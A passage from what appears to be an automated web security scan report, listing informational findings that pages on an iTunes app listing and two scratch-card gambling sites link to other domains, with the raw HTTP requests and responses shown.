http://a2.mzstatic.com/us/r1000/013/Purple/c5/65/bc/mzl.qtmygdec.320x480-75.jpg
http://a2.mzstatic.com/us/r1000/025/Purple/d1/89/b2/mzl.muadfeos.320x480-75.jpg
http://a2.mzstatic.com/us/r1000/027/Purple/03/57/95/mzl.ymbbdpjg.100x100-75.jpg
http://a2.mzstatic.com/us/r1000/030/Purple/1a/23/ae/mzi.emwzndug.100x100-75.jpg
http://a2.mzstatic.com/us/r1000/046/Purple/9d/d3/c3/mzl.lagruyvy.175x175-75.jpg
http://a3.mzstatic.com/us/r1000/043/Purple/06/d7/f8/mzl.ravxxpan.320x480-75.jpg
http://a4.mzstatic.com/us/r1000/048/Purple/89/ee/78/mzl.hqiwnnbm.320x480-75.jpg
http://a5.mzstatic.com/us/r1000/000/Purple/05/6c/14/mzl.kytupfun.100x100-75.jpg
http://a5.mzstatic.com/us/r1000/017/Purple/f4/3f/3f/mzi.pvlnlbjh.100x100-75.jpg
http://a5.mzstatic.com/us/r1000/039/Purple/a5/b8/5d/mzl.algqcmgk.320x480-75.jpg
http://ax.phobos.apple.com.edgesuite.net/images/web/itunes_preview/itunespreview_en.png
http://r.mzstatic.com/htmlResources/5176/web-storefront-base.cssz
http://r.mzstatic.com/htmlResources/5176/web-storefront-base.jsz
http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.cssz
http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.jsz
http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62
http://www.moblio.nl/
http://www.postcodelottery.com/

Request

GET /us/app/pclottery/id399201446?mt=8 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 16 May 2011 12:13:20 GMT
x-apple-orig-url-path: /us/app/pclottery/id399201446?mt=8
x-apple-application-site: NWK
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?mt=8&id=399201446&cc=us
x-apple-application-instance: 11062
x-apple-aka-ttl: Generated Mon May 16 05:13:20 PDT 2011, Expires Mon May 16 05:14:20 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=54
Date: Mon, 16 May 2011 12:13:20 GMT
Content-Length: 23425
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">

<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/5176/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.cssz" />

<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.jsz"></script>
...[SNIP]...
<h2><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/itunes_preview/itunespreview_en.png" alt="iTunes" height="32" width="263"></h2>
...[SNIP]...
<div class="app-links"><a rel="nofollow" target="_blank" class="see-all" href="http://www.moblio.nl">moblio.nl Web Site</a><a rel="nofollow" target="_blank" class="see-all" href="http://www.postcodelottery.com/">PPLottery Support</a>
...[SNIP]...
<div class="lockup"><img src="http://a3.mzstatic.com/us/r1000/043/Purple/06/d7/f8/mzl.ravxxpan.320x480-75.jpg" alt="iPhone Screenshot 1" class="portrait" /></div><div class="lockup"><img src="http://a2.mzstatic.com/us/r1000/013/Purple/c5/65/bc/mzl.qtmygdec.320x480-75.jpg" alt="iPhone Screenshot 2" class="portrait" /></div><div class="lockup"><img src="http://a4.mzstatic.com/us/r1000/048/Purple/89/ee/78/mzl.hqiwnnbm.320x480-75.jpg" alt="iPhone Screenshot 3" class="portrait" /></div><div class="lockup"><img src="http://a2.mzstatic.com/us/r1000/025/Purple/d1/89/b2/mzl.muadfeos.320x480-75.jpg" alt="iPhone Screenshot 4" class="portrait" /></div><div class="lockup"><img src="http://a5.mzstatic.com/us/r1000/039/Purple/a5/b8/5d/mzl.algqcmgk.320x480-75.jpg" alt="iPhone Screenshot 5" class="portrait" /></div>
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/030/Purple/1a/23/ae/mzi.emwzndug.100x100-75.jpg" width="100" class="artwork" alt="Diptic" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/027/Purple/03/57/95/mzl.ymbbdpjg.100x100-75.jpg" width="100" class="artwork" alt="Booking.com - Hotel reservations for 120,000+ hotels" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/001/Purple/1d/50/0e/mzi.xelohegg.100x100-75.jpg" width="100" class="artwork" alt="AppShopper" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a5.mzstatic.com/us/r1000/017/Purple/f4/3f/3f/mzi.pvlnlbjh.100x100-75.jpg" width="100" class="artwork" alt="MobileMe Gallery" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a5.mzstatic.com/us/r1000/000/Purple/05/6c/14/mzl.kytupfun.100x100-75.jpg" width="100" class="artwork" alt="Dropbox" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/046/Purple/9d/d3/c3/mzl.lagruyvy.175x175-75.jpg" width="175" class="artwork" alt="PPLottery" height="175"><span class="mask">
...[SNIP]...
<div class="fbfan">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:63px;" allowTransparency="true"></iframe>
   </div>
   <div class="fbfan last">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:63px;" allowTransparency="true"></iframe>
...[SNIP]...

18.11. http://primescratchcards.com/images/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/index.asp

Issue detail

The page was loaded from a URL containing a query string:

http://primescratchcards.com/images/index.asp?curr=USD&g=3

The response contains the following links to other domains:

http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://twitter.com/PrimeScratch
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/pages/PrimeScratchCards/122783514413813
http://www.gambleaware.co.uk/
http://www.gamcare.org.uk/
http://www.lga.org.mt/
http://www.primegaming.com/
http://www.youtube.com/user/primescratchcards1
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /images/index.asp?curr=USD&g=3 HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:00 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<center><a href="http://www.facebook.com/PrimeScratchCards" target="_blank"><img src="images/side/197x100_FB.jpg" width="197" border="0">
...[SNIP]...
</a>
       <a href="http://www.youtube.com/user/primescratchcards1" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tube.png" border="0"></a>
       <a href="http://www.facebook.com/pages/PrimeScratchCards/122783514413813" target="_blank"><img src="http://www.primescratchcards.com/images/sn/fbook.png" border="0"></a>
       <a href="http://twitter.com/PrimeScratch" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tweet.png" border="0">
...[SNIP]...
<area shape="rect" coords="10,10,120,60" href="HelpDepositMethods.asp" alt="" title="" />
<area shape="rect" coords="125,10,208,60" href="http://www.gambleaware.co.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="338,9,419,59" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="" title="" />
<area shape="rect" coords="423,8,539,58" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" target="_blank" alt="" title="" />
<area shape="rect" coords="546,8,582,58" href="http://www.gamcare.org.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="631,4,724,54" href="http://www.lga.org.mt/" target="_blank" alt="" title="" />
<area shape="rect" coords="738,7,812,57" href="http://www.primegaming.com/" target="_blank" alt="" title="" />
<area shape="rect" coords="823,8,848,58" href="underage.asp" alt="" title="" />
...[SNIP]...

18.12. https://scratch.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/

Issue detail

The page was loaded from a URL containing a query string:

https://scratch.betsson.com/en/?navbar=true

The response contains the following links to other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreCSSV2_v95924.css
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterCSS_v2983.css
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/scratch/en/productLogo.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_3-Wow.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_7th-Heaven.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Golden-Fortune.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Holiday-Hotel.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Jungle-Joy.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Legend-Of-Terra.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Sea-And-Sun.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Super-3-Wow.png
https://scratch.betsson909.com/en/Classic/3-Wow
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.BETSSON.COM&lang=en

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:45:00 GMT
Content-Length: 160229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

<link media="all" href="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreCSSV2_v95924.css" type="text/css" rel="StyleSheet" />

<link media="all" href="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterCSS_v2983.css" type="text/css" rel="StyleSheet" />

<style type="text/css" media="screen">
...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
<a onclick="getIsland('StartPage.aspx','divMain','',true);return false;" href="/en/Default.aspx" >
<img src="https://ble.hs.llnwd.net/e1/scratch/en/productLogo.gif" alt=""/>
</a>
...[SNIP]...
<span id="ctl00_ctl00_cphMain_cphMain_ctl00_Gametip"><a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a>
...[SNIP]...
<a href="/en/Classic/3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_lnkGame" onclick="openScratchClientWindow(0, 0, 42, '41', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameName">
...[SNIP]...
<a href="/en/Slots/Sea-And-Sun" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_lnkGame" onclick="openScratchClientWindow(0, 4, 88, '92', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Sea-And-Sun.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameName">
...[SNIP]...
<a href="/en/Slots/Holiday-Hotel" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_lnkGame" onclick="openScratchClientWindow(0, 4, 87, '89', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Holiday-Hotel.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameName">
...[SNIP]...
<a href="/en/Classic/7th-Heaven" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_lnkGame" onclick="openScratchClientWindow(0, 0, 62, '58', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_7th-Heaven.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameName">
...[SNIP]...
<a href="/en/Classic/Jungle-Joy" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_lnkGame" onclick="openScratchClientWindow(0, 0, 53, '45', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Jungle-Joy.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameName">
...[SNIP]...
<a href="/en/Classic/Super-3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_lnkGame" onclick="openScratchClientWindow(0, 0, 76, '79', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Super-3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameName">
...[SNIP]...
<a href="/en/Slots/Legend-Of-Terra" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_lnkGame" onclick="openScratchClientWindow(0, 4, 89, '101', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Legend-Of-Terra.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameName">
...[SNIP]...
<a href="/en/Classic/Golden-Fortune" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_lnkGame" onclick="openScratchClientWindow(0, 0, 86, '90', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Golden-Fortune.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameName">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl04_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl05_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl06_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl07_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl08_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl09_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div class="service-info overlay"><a href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.BETSSON.COM&lang=en">VeriSign Secured</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

18.13. https://scratch.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/

Issue detail

The page was loaded from a URL containing a query string:

https://scratch.betsson.com/en/?navbar=true

The response contains the following links to other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreCSSV2_v95924.css
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterCSS_v2983.css
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/scratch/en/productLogo.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_3-Wow.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_7th-Heaven.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Golden-Fortune.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Holiday-Hotel.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Jungle-Joy.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Legend-Of-Terra.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Sea-And-Sun.png
https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Super-3-Wow.png
https://scratch.betsson909.com/en/Casino/Slot-Super-7
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.BETSSON.COM&lang=en

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:42:26 GMT
Content-Length: 160216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

<link media="all" href="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreCSSV2_v95924.css" type="text/css" rel="StyleSheet" />

<link media="all" href="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterCSS_v2983.css" type="text/css" rel="StyleSheet" />

<style type="text/css" media="screen">
...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
<a onclick="getIsland('StartPage.aspx','divMain','',true);return false;" href="/en/Default.aspx" >
<img src="https://ble.hs.llnwd.net/e1/scratch/en/productLogo.gif" alt=""/>
</a>
...[SNIP]...
<span id="ctl00_ctl00_cphMain_cphMain_ctl00_Gametip"><a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a>
...[SNIP]...
<a href="/en/Classic/3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_lnkGame" onclick="openScratchClientWindow(0, 0, 42, '41', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameName">
...[SNIP]...
<a href="/en/Slots/Sea-And-Sun" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_lnkGame" onclick="openScratchClientWindow(0, 4, 88, '92', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Sea-And-Sun.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameName">
...[SNIP]...
<a href="/en/Slots/Holiday-Hotel" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_lnkGame" onclick="openScratchClientWindow(0, 4, 87, '89', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Holiday-Hotel.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameName">
...[SNIP]...
<a href="/en/Classic/7th-Heaven" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_lnkGame" onclick="openScratchClientWindow(0, 0, 62, '58', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_7th-Heaven.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameName">
...[SNIP]...
<a href="/en/Classic/Jungle-Joy" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_lnkGame" onclick="openScratchClientWindow(0, 0, 53, '45', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Jungle-Joy.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameName">
...[SNIP]...
<a href="/en/Classic/Super-3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_lnkGame" onclick="openScratchClientWindow(0, 0, 76, '79', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Super-3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameImgId" />
